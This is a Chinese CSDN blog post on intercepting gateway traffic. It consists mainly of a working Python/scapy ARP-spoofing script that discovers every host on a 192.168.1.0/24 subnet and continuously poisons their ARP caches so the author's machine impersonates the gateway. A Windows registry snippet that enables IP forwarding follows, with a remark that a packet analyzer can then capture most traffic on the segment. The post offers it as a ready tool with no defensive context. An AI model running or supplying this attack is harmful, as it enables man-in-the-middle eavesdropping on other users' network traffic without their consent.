网关流量截取

最新推荐文章于 2024-04-30 10:50:49 发布
最新推荐文章于 2024-04-30 10:50:49 发布
阅读量1.1k 收藏
点赞数
分类专栏: python 文章标签: 中间人
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/osummertime/article/details/84000978
版权 
#coding:utf-8
from scapy.all import ARP,send,arping
import sys,re,time
stdout=sys.stdout
IPADDR="192.168.1.*"
gateway_ip="192.168.1.1"
#本机mac地址
gateway_hw="AF:AF:AF:AF:AF:AF"
p=ARP(op = "who-has",hwsrc = gateway_hw,psrc = gateway_ip)
def arp_hack(ip,hw):
  t=p
  t.hwdst=hw
  t.pdst=ip
  send(t)
  #time.sleep(1)
def get_host():
  hw_ip = {}
  sys.stdout = open("host.info","w")
  arping(IPADDR)
  sys.stdout = stdout
  f = open("host.info","r")
  info = f.readlines()
  f.close
  del info[0]
  del info[0]
  del info[0]
  del info[0]
  for host in info :
    temp = re.split(r"\s+",host)
    hw_ip[temp[1]] = temp[2]
  return hw_ip
if __name__ == "__main__":
  hw_ip = get_host()
  while 1 :
    for i in hw_ip :
      arp_hack(hw=i,ip=hw_ip[i])

所有设备网关欺骗

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"IPEnableRouter"=dword:00000001

windows开启ip转发
需要重启!
配合分析器就可查看同网段大部分流量

osummertime
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Istio服务格中的流量复制(六)
江晓龙的博客
06-22 1560
在发布新版本前,测试同事会通过很多的测试工具对新版本的程序进行压测,虽然可以模拟出很多的流量,但是也不算是真实的流量请求,上线后还是不能保证其他问题的发生。当需要用真实的线上流量进行新版本的测试,但是也不能真的让测试中的版本为线上用户提供服务,基于这种情况,Istio可以通过VirtualService虚拟服务将线上的真实访问流量复制一份到其他的环境。Istio流量复制的技术被称为流量镜像,主要用于将线上真实的流量复制一份,然后通过Proxy代理程序根据策略处理请求,然后转发到某个版本的程序上,并不会影响真
基于Sentinel的亿级流量复制方案
SOHU_TECH的博客
11-10 354
本文字数:10725字预计阅读时间:27分钟1. 前言API 是随着微服务(Microservice)这个概念一起兴起的一种架构模式,它用于解决微服务过于分散,没有一个统一的出入口进行流量管理的问题。当使用微服务构建整个 API 服务时,一般会有许许多多职责不同的应用在运行着,这些应用会需要一些通用的功能,例如鉴权、流控、监控、日志统计等。在传统的单体应用中,这些功能一般都是内嵌在应用中,...
应用程序层服务器,使用应用程序路由流量
weixin_35702498的博客
07-30 242
使用应用程序路由流量已完成10 分钟应用程序管理客户端应用程序可发送到 Web 应用的请求。 应用程序根据请求的 URL 将流量路由到 Web 服务器池。 这称为“应用层路由”。 Web 服务器池可以是 Azure 虚拟机、Azure 虚拟机规模集、Azure 应用服务,甚至本地服务器。应用程序如何路由请求客户端将针对 Web 应用的请求发送到的 IP 地址或 DNS 名称。 ...
流量与服务的区别
最新发布
IT深耕十余载,大道之简
04-30 606
流量和服务在微服务架构中可以协同工作,以实现全局流量管理和微服务治理的双重目标,从而达到更好的效果。
限流
Osborn的博客
07-10 687
1、redis incr加过期时间来限流。 int current = jedis.incr(key); if (current + 1 > limit) //如果超出限流大小 return 0; else if (current == 1) //只有第一次访问需要设置2秒的过期时间 jedis.expire(key, “2”); return 1 2、另外还有通过redis+...
家庭自动化(二)配置数据获取工具
shiliqiang167的博客
08-29 530
前一篇博客中谈到,家庭自动化实质是在不同配置数据下的通用业务逻辑,通用业务逻辑可以自己开发也可以用通用的商业测试脚本,但是各个厂商的配置界面肯定是不同的,配置数据需要定制。配置数据的数据化,键是获取http消息里面的配置数据。本片博客重点介绍我是怎么实现配置数据的快速获取的。配置数据的获取,我主要是采用了自己开发的一个叫做GUIMessageRecorder的软件。我先介绍一下这个软件的使用...
arpSpoofing.rar_arpspoofing_arp欺骗
07-13
攻击者运行这个程序后,会向络发送虚假的ARP请求包,使得所有原本应该流向流量都被重定向到攻击者的电脑。这种情况下,攻击者可以监控到所有的流量,甚至可能篡改或阻止这些流量。同时,捕获到的包会被...
基于linux的计费系统键技术研究.pdf
09-07
1. **数据包截取与记录**:计费系统依赖于用户的流量数据,这需要系统能够捕获并记录IP层的信息,包括源IP地址、目标IP地址和数据包长度。在TCP/IP协议栈中,IP层是最键的层次,因为它包含所有高层协议封装的信息...
电信设备-基于WEB安全的服务器指纹拟态和敏感信息拟态方法.zip
09-18
4. **WEB安全的角色**:WEB安全作为络防御体系的一部分,位于内部络和外部互联之间,负责过滤恶意流量、阻止非法访问、检测和防止入侵。通过服务器指纹拟态和敏感信息拟态,WEB安全能够提供更高...
Fragroute是一个数据包处理工具,可以拦截,修改和重写流量。你可以使用此工具执行大多数络渗透测试,以检查络的安全性
05-26
fragroute能够截取、修改和重写向外发送的报文,包括IP、TCP层的数据包碎片以及数据包数据重叠技术等,它使用一个简单的配置规则来实现的外出报文的延迟(delay)、重复(duplicate)、丢弃(drop)、分片(fragment...
ARP欺骗攻击与防御策略
10-18
6. **络监控**:定期进行流量分析,发现异常行为及时处理。 理解ARP欺骗攻击的原理和防范措施对于络管理员来说至重要,因为这种攻击手段在现实络环境中仍然常见。通过加强络设备的安全配置,提高用户...
限流算法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-17 255
的计算方法?通过ip和子掩码。 这个比较长哦 看它是用多少位划分的如192.168.10.0/24那么它的络地址是192.168.10.0广播地址是192.168.10.255不是算出来的它起着通信转发作用(也不是很恰当这么说) 的计算方法?通过ip和子掩码。 这个比较长哦 看它是用多少位划...
Linux作为一台转发流量,嵌入式Linux LEAF
weixin_26872311的博客
05-14 435
LEAF 是一个安全、功能丰富、可定制的嵌入式 Linux 络设备,用于各种络拓扑逻辑,目前主要作为、路由器、防火墙和无线AP来使用。L3在leaf节点使能图1. L3在leaf节点组说明(如图1所示):对于L3转发要求不高的场合,可以采用在leaf边缘使能集中的L3功能;Spine节点不再担当L3的功能,只执行TRILL转发功能,也不学习用户的MAC;执行leaf功能的...
通过流量复制解决某个服务节点无响应的问题
Leo's Blog
07-19 1310
说明:这里仅说明单台服务器的情况.Docker Container 分别映射到不同的端口. Docker Container里通过tomcat对外提供服务. 1.如图,如果反向代理服务器发来一个请求,请求到达Nginx后,假设是匹配到Service A的Upstream,这时会根据nginx.conf里对应的分发算法,分配到端口10100或10101. 2.假设10100对应的docker c
灰度上线实践之zuul流量分配
喜码拉雅
04-26 971
最近手头的项目进行了重构,改动比较大,直接上线的话风险较大,于是我采用了灰度上线的方式来将风险最小化。 我们系统包括自己的门户页面,也作为中台来给各个业务方调用,我们灰度上线的话,要兼容各个业务系统。 业务系统调用我们接口是前缀是特殊的,可以和我们的门户调用区分开,且业务系统调用所有接口都是有签名的,每个接口的参数格式都是一样的,会含有每个业务系统的appId 之前流量是经过nginx直接打到我们的服务商,这次在nginx和我们系统之间添加了,作为我们灰度的核心--流量控制 于zuul可以
Tcpcopy复制流量-实战
忆网
03-29 7663
1.环境配置 版本:TCPCopy --> TCPCopy V1.0.0 线上服务器 --> 192.168.88.88 测试服务器 --> 192.168.88.66 辅助服务器 --> 192.168.88.86 辅助IP(流转) 192.168.100.100 2.线上机器安装tcpcopy 在线上服务器上下载,然后编译安装tcpcopy的包,如下:...
Feature之实现流量转发
大鸡腿的博客
02-24 775
前言 流量转发一般是由ng还有来处理,但是在架构组工作里面,有些应用是不能接到业务,技术还在建设中,暂时实现服务进行流量转发 实现思路 可以重写servlet,然后通过httpclient来请求,然后复制对应response值、header、cookie来实现流量转发 上代码 第一步配置servlet @Bean public ServletRegistrationBean servletRegistrationBean() { ServletRegistration
API平台API流量统一入口
RestCloud的博客
09-15 1807
API平台API流量统一入口API作为API平台的API流量的统一入口承担着非常重要的数据输入输出工作,API最核心的作用是对服务进行路由并进行数据转发,API将成为前后端交互以及内外交互的唯一数据进出口,所以API适合于进行服务鉴权.数据缓存.流量控制.日记记录.熔断控制.协议转换等。 一、API性能 1.经过多年的研发和迭代RestCloud API已经在众多500强企业中使用,在快销.制造.政府.公安.教育等行业得到众多项目的实际验证,具有非常高的稳定.
API(TYK)设置流量控制
The magic of fingertips
03-08 5712
TYK中设置流量控制和访问控制有两种方式,1、在生成key的时候设置访问权限配置如下图:然后点击create即可,然后访问,每小时只能访问两次2、使用policies设置(实质是设置policie模板,然后在生成key的时候,使用模板覆盖自定义设置)这里我对policie的设置如下在生成key的过程中,选择Policy,会自动覆盖下面的自定义配置,下面的操作就和上面的一样了2016-07-21 b
百亿流量的API设计-.pptx.pdf
01-27
"《百亿流量的API设计》是一份由秦金卫(KimmKing)于2018年9月编撰的PPT,专注于在面对巨大流量挑战时,如何设计和优化API以满足企业级应用的需求。该文档深入探讨了API Gateway在现代互联架构中的键角色...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值